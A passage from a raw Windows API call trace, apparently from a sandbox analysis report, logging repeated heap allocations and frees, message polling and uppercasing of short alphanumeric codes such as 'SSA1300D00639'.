lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0242.868] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0242.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.869] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0242.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0242.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0242.870] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0242.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0242.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0242.870] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.871] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.871] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.871] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0242.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0242.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.872] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.872] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.872] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.872] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0242.872] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0242.872] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0242.872] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0242.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0242.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.873] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0242.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0242.873] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0242.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.874] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.875] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0242.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.875] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0242.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0242.878] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.878] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.878] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.878] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.878] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.878] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.878] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.879] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb 